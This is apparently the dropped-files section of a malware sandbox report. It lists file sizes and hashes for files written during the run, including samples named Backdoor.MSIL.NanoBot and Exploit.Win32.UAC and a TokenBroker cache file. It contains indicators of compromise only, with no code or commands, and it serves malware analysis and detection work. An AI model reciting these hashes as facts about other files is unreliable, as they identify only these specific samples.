SHA512583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511
-
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize
1.9MB
MD52b4b02a65cf62ff921987e3b4a133692
SHA150cc1d519adc1c5521a2b76148788fdca636e31e
SHA256f8ba660f894a98c352cda39dddbdd3135d176fe425bac0b04a030f5f6f07ade6
SHA512911f39ece679fd5f8b48ed3903401f4bb5d458b134add57e2b64e3829999ec11be0ffcea6069c13947188f99b91244997b784b86a32610b8c1ec845cbfe73377
-
Filesize
944KB
MD5ccecbdbcad82f891800c43b26b7b1028
SHA1addb87388db6157dbf4201d985ee940fee75f11d
SHA2568d90e5c39b30e05be86d70b79c67715901e956df706e0d8964e34a5f94528b78
SHA512345765f86b43d8cb589ff442e4fc4aef7d9573283154f1aa8ef3761f9730a493beb4932f2465ef92581a8b9e929255fc5dbe7a84177bb1c114ff29aa44154933
-
Filesize
776KB
MD5347d21c509be361e3376cfd5f7b2bb9d
SHA19739576e3a5bb4d5c9fedfa17d0994bb261d7d8b
SHA256b8b59cd29e20edb5d2bdb2ca0984b6a91c345f7dccf22f97043f5f7f699bb041
SHA5123e64aa44ab47380ad78cfcc0b9822ae2882a4397c5ea8078f8d19e1d88c06e3778f5a848b3c21621cf584ce1b9219c251569908a33a3670d625c94ac8a824a8f
-
Filesize
778KB
MD5f7d7f1020cc9ac4cc6cf304fddeb74c1
SHA18433b552a459c9fd73073e8f592563d297043521
SHA2567dae74a8af2bc7bc5cea34cd13fdd137534072116657ac97f2439422ca42246a
SHA5120528f8077146ebca9c54752c31bd4f1dea7c4510eb2c2e4fa3278a649ea6ba04679dd4d3900d3fff2edf59800d571a0c188bc6bbeebd787171343c24f5db771d
-
Filesize
2.2MB
MD53b353b33185e75ae07d336cf0b294803
SHA1827816d5cbe12a85b3756413c844d02ce12e206a
SHA256b2e75d6137cee1dff55ca375389c8ed11809ba0ac4684fdbd5eb451c370ea63a
SHA5124e6a71ada5cc21b19ef3a17416cbba9f96ff8c46f30196cd3bb03b57a03ef9fbae1f4b338270efc819bc0f53a57c53b5679620c464fa686303d4073aaaf59d2f
-
Filesize
777KB
MD5682ea8a527f4bc694e73740b625cdd6d
SHA1871913a8b11d345dbd3742bfe3cf09b6ca3ac0db
SHA2565469dec9189de1a8d0387863bceba17a686a57902215c4bac5232060312d1f75
SHA5122ab901249161b8012ca9a58c9efad498aad543f851aa4fe73549af33464bf58cd0d52b079fe93e184aa6d4d107488a35a9fabac7c404fbd1b58aac948a6ddc92
-
Filesize
777KB
MD5cd8bdf2b534af11c2ce5f7246d857187
SHA1286423b5b7a06a53a1246b20fce01653c4fa2c0b
SHA256eb3d7a49483b5e5cf91a6765d60f6645a483c9ecbe7669cc829a2ac444a39cf0
SHA512bb8718cdebccb2552341bb4aa433bbd64d1c5666186c9270f27d8dd40045f6ae68be6c4c47f22cf88904eb4c6e69e10aeb8b2330fd56d6db92bb4c40bdadefd5
-
Filesize
777KB
MD575809351f620d2dbba8a40e04f883aa9
SHA1b385698c5bea3424f9d8009f6d7e0ceae6e9ecd8
SHA2568509fc36b2658897a86e5c4f976050ef263703b42c76864a7994c90ed0ed2db4
SHA512d2a0bea19cc2e932e61b54ce37386fdb8627acb3694905d944cc103263f8aa4a909dbf89a9e3419a0383a8447e642a10932f9ada80fff7b05ea4f90b353449bd
-
Filesize
777KB
MD510e1ac0628d8493c8cd9d146b6c25e35
SHA1d084bdcedbcad8224a40b5b8ace63dcbbb82b097
SHA2568699d10fb7a170a1c326bac6735ed70d0fff77d3b26d416b7ca9c9e290efae2a
SHA5127be5533cff24539ae8235e042b5825d56fea7245e70b319a6707b1629d21d8d4be8735782059bc6ed84a470ab157d19e931322853badf5331d076a02a2833634
-
Filesize
777KB
MD58415c6188b7c62a0da15b7d2f5542578
SHA158ea8b72fb9a839d49372085a65a3efdcf957e8f
SHA256f41ca2a5e3cde6ccb552cbeb3c1e4a17a89fa003a7a9e6d747437e87c9ca2459
SHA5129735a27efe67e6538509813cc1da60a2097e75e63a1b3cdbb26414fbfee0ced18951c9922b63b2b6e7598690821d148df3e5e646c26ef35289361453db30b079
-
Filesize
777KB
MD5219fbb713fa0ce3c264077c924a06abe
SHA1ac2140ce04e4fe70b5196a93f8ed2b25f22992a5
SHA2562dd67dfd19451e694d93ed8df933879f35400f7688c48de511a8e3684edaf6b9
SHA5122c4d4a64a61a0cae62e4c0801acc8da78d90649c290fb954d0796e0bf6803b734cd3b054bb82c151b914cd1d9eb5cdf5f251421d6947d018c2733770b21ee92a
-
Filesize
777KB
MD564e1b37e46b3913caa11e6c05c95ba9d
SHA19493237590e85e27a0249db42b182591d5439b71
SHA2567353433d691ab8aa3dc235076d2237367e2d6d83751abb8a22c93bd6682ff68a
SHA5121d03f977dd826310a1694474b052caf1e75c7e217f04a44e6421c2917394250fe1727cd70c784ad415d3ac0c69b1b6e07b6a11cdccd2834a5797690664bd6a65
-
Filesize
777KB
MD523154a5fa40d113ef1c7772e26ae30a1
SHA14286b01b1ce6c2766c6b39f8f650d3271846465f
SHA256954897076e86b41860eafced3540531b5d12354f2d48f5f1da0ea386469cb8a7
SHA51290abe7a15b1009ebd6b60a7a8818f2867ccbbe356f15b304d04510d980816ceb1ba5943196843a095b102a6a32638b8e8edbd84ecd70e669afce6e202292370e
-
Filesize
2.2MB
MD52811e6d308b39c2ca1e11d8d7e2ad69b
SHA10d9b6d03e7663c7f23f9f01e5d85459363491771
SHA2567ac58e5a872ac5fd6e5ad6c0d3b678936be6c77a6e4c9213700513017fcb21f5
SHA512a75cf5b7872fd865035237d624567aab376058896949d921f8c439ce436e32351ec00bb8e71dfaff1cca07f1d17d926311c30725e8d3d6d44bfa8823d7fe0657
-
Filesize
398B
MD5e766ea295d4b5a787d14eccff6dc64e1
SHA117df7c5ae0e1ccc566e8985a0cfc67b1bbf807da
SHA2561bbd2c212c788c5a96c1e2bba973b1270a86aa096fdd1239e6cb06360b81496b
SHA51292c00df49f836e2c0e59fbb13fef447186f5b1e1d9c2d0663d9f3927a46fe630074f80630cef31575d429bf2caaa9016ccf899f2bfacaf28abff85a32f0c1571
-
Filesize
138B
MD55a14fa9448a36120fa13e30c1c27cea1
SHA1d9ee005ff4638392b77541a9ceddbf17df53ab82
SHA2569371524b0fdb3d92b5c7c90f040c962ca129395d4688ef898087045223ee6f73
SHA5128f861200363a9d9784b0be584bd90d3dc1f9b7f77710c6bd160e8d7c8989e6330b10e9cfecd25dd13158ab1d28d6925ef9135e73c185fe211de1129122aa2a1f
-
Filesize
255B
MD5ee0996325569f1a4739509708717f8f3
SHA13514f1e94cb2f745ed8ff84875fd2d90a9e68bc7
SHA2567631ab00b4b6868f57e9ed5e80bc5b12457ea912759490cbea95101f7918844a
SHA5126b6a66ff69e4945328a868a31ef07cac425a1372c77e9cd090d5637d9686555506ce851d72473263d522bef07a9ba2bd39e59cc50f9218588dd0e00021068f4d
-
Filesize
131B
MD59acf11d00161e3f209c06e4577eb42c6
SHA1bed9c68c145ce8bdf7f3d60d374891fd57e72bb1
SHA25617432647b9096ed21d2a1ba618e11feef7f055f51abdd19ef23a85142ec1b51b
SHA512271fc2d1264ac153c847a0ad75654bdeb2062217629e68e085f338c22a70e558d9f89c358e5428548f9ab0d754bfcd7d6211696f39535f2672a2b98c65b89baa
-
Filesize
366B
MD5408e11f699d802ea56fabac297802c5e
SHA1c07e71e98a52511dfd1c8ffb2803a41d6b9b3f8f
SHA2561e86c340c81834db772c9e1e48f89534eeed9b386bc5b02d5907fc8f71ea4fe4
SHA512e165b551abeba9ee85efc7d89b98fa822c203d24d5ce7e175acb7da43eab944a35a01fb3891ff7ad852a1cc33b549fbb96d84b8f10978bd5332b54fc2a22e126
-
Filesize
1KB
MD5c830fde2d469ea25922346b9166da248
SHA18dc4fa362b2f79b5294265981256e623553172f9
SHA25659ee85c3ee8a0cb34a2b82168456748731d3ae81d15b0806ed861a5be0c012c1
SHA512a045bca872978579e7d5039fdce839a6de98e4a8e5031a809653cdc0b11832a89d2076be0fc1d8456baaf62947e43934827b37cef815a8cee1918d80280656bd
-
Filesize
280B
MD5a51251193e5a96b91dac38e68b4bc354
SHA18d2ead1a3f0e73d26ffc8ffdb9748b6b2645aaf8
SHA256069bdf8fe972bc47197e00ae6f4d70edc6ca33ad557f937f46de28fa1df548ea
SHA512f90cec88fdec05a4bba4b2c26b27f3e8737089941ce0f2e55e4fa0059f1b411036e18c63fe48f83f1e578a645d710d76e749b932f6c2b1357ca812bf8fe67776
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\7306cad3-dab7-4221-8517-6b5c6e8e99be.tmp
Filesize2KB
MD587c4399586b58fd455dae688b48a3a9e
SHA173a2c3f9e6c4edf9f0ea1913bcf3f838858d05c3
SHA256a623d3a12f2aee568a4ef0eb320eff90687e62d96d63770b4b3568785c33584e
SHA512c84c27d65a78c6c6d8eecdf53605b93af803f5ce444f6ecd43f996b4cb247064cee59a0316f5ca515a333d84f1dfe6bc57177ae088099a8ef765c2d5a7dae0c5
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
40B
MD520d4b8fa017a12a108c87f540836e250
SHA11ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA2566028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856
-
Filesize
11KB
MD58ac641c106ede4873d5561f649c4bb1f
SHA1e74a2f7ea03d02618fda48ea73ffbc69054d551a
SHA256b90f98ace32ac83196686379882537588f56d88b415548c4e16c416bfa6f1da5
SHA5121f75e95425679252092d0e81112c5564cda5586c0e8d68ac57c113f9442e21035b43593d90e876248ca0630eeb63232002d872b31f24756a8cdaa68a6cd912dd
-
Filesize
30KB
MD5a33277752bc25282318c7eac3be29ff5
SHA1712c5fb51f8b9e98b8e95e8b661dcfaaccdd0be7
SHA256964d9417ebd07a861565aa4b70f18cef016a09bf6e6cd760e88e4eb2b80d6353
SHA51228ba8b3807e1ecc1523918e934508786bbf93fcba99f8302006fa226b68ac062ad9b1bf7ad5d3ee5f57014ec97386728b933f62a9adfa8a19b27688e2c3eae69
-
Filesize
80KB
MD5b19feaffcb8c2746e2a77a104a42f531
SHA1e413550e59bbcc0115e150c0a4200d438e159460
SHA2562779a4d42260fb01c0d73eb261977832453a8b26634189c694ba25e0f82b8731
SHA512403a83193e0eef3d27cacac16f1234f926c92db202b668bae433dd47ded82a8ade6ed6222bd350f154cb039ee5143217c67a8edf26cb9c12172a7f8878eef62e
-
Filesize
80KB
MD5f6547f668dba80e43fab265ffad55bbd
SHA18d964e57022c5f0fbc7bbba7af5ef7a084149daf
SHA2563036b48eec7893aaa509f86d176eb670be4e21725643ab67fe53952da8ae6baa
SHA512c4c25db6873dfd90ded68eb8d2f35dc04d286db7f0c481a9c3da2a79269a78419529eb1bfe3a64e28b57b6b28626c779a5e96766a0f8142a616a9fe463aeb82d
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\e0495fde257df2ef62ee7e3fdb1ebb9d7ff72300.tbres
Filesize4KB
MD5972353f37794cb14f68724b4c06e560c
SHA106cee0a8865abc5e548e2f0d1d1bfcf86e14af0d
SHA256d545889b58474f6fe36859312b09e1902859e39bc5e1d315dfdacc1df6234c04
SHA5125b3c0be47574d0c9d89623e1e063f6f33534d107f320477483493b683ec5ab3af45a4faf03265a90d26fa48a52e96fc146bc1bd4cd128007e48c963901d65f92
-
C:\Users\Admin\AppData\Local\Temp\is-5U2SS.tmp\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.tmp
Filesize2.5MB
MD59e4ddba75b20c325646092d89f79baf5
SHA156d384434e4d4d2ab8d9f7b610d9fcbf2bfff712
SHA2562bd560d11efa41866ddee01bb41d3f251bf65d0ddc5adfc7d0f7e821fa7199e7
SHA512894875cc20cbd4d32a0f28f20a2e4c5ee4c97d8bf384bc71f65d51c6adf7ecdcefc683d0646b1c475ad99f83ee296e77b25dfc12d9816f8973d3298be940a00c
-
Filesize
1KB
MD5c6f0625bf4c1cdfb699980c9243d3b22
SHA143de1fe580576935516327f17b5da0c656c72851
SHA2568dfc4e937f0b2374e3ced25fce344b0731cf44b8854625b318d50ece2da8f576
SHA5129ef2dbd4142ad0e1e6006929376ecb8011e7ffc801ee2101e906787d70325ad82752df65839de9972391fa52e1e5974ec1a5c7465a88aa56257633ebb7d70969
-
Filesize
1KB
MD50339b45ef206f4becc88be0d65e24b9e
SHA16503a1851f4ccd8c80a31f96bd7ae40d962c9fad
SHA2563d568a47a8944a47f4aed6982755ac7ff7dda469cc1c81c213ecaa5d89de1f83
SHA512c98f4513db34d50510dd986e0d812545c442bd5bef26932032b165759627fab4e00c95fe907ab3416a8a1042bfa77aa516c479f1ff7d1ec2f21ae66df8f72551
-
C:\Users\Admin\Desktop\Backdoor.MSIL.NanoBot.bcqs-78c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b.exe
Filesize1.5MB
MD50e9696e5243ab48a683daf1451d34498
SHA1742bbc4f74e474216088ebfce6239b60138a161d
SHA25678c838211909eeaaf2518dcedc0cefa3522c2b99823ee720c96a35b4a96f6d6b
SHA5122ae0068f5174e0ac680362fa6e1dd954dc2d3f6adf320909b5291bd4664ffe053e994c975c7bcb2083f43786566f1081b413fab7ae53538994f26981d3a9cbeb
-
C:\Users\Admin\Desktop\Exploit.Win32.UAC.fal-593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d.exe
Filesize4.4MB
MD51d4efaa3a3309077e11186229a3892ce
SHA18aa300ba3f665eb8b6fe15ce1012569fe81ac188
SHA256593f6f872a3f5c378bc43383cebcf468f3469dedd09e3ad9bd0c3e6ae266549d
SHA512a77a6dfbdebe3fae4f9142888cffa84e917f569ee570ace65d96accfef4bf904b01077b938c1725c2cced5bab9ea93d054f0cc7b905e15ead0e6504ab2382566
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e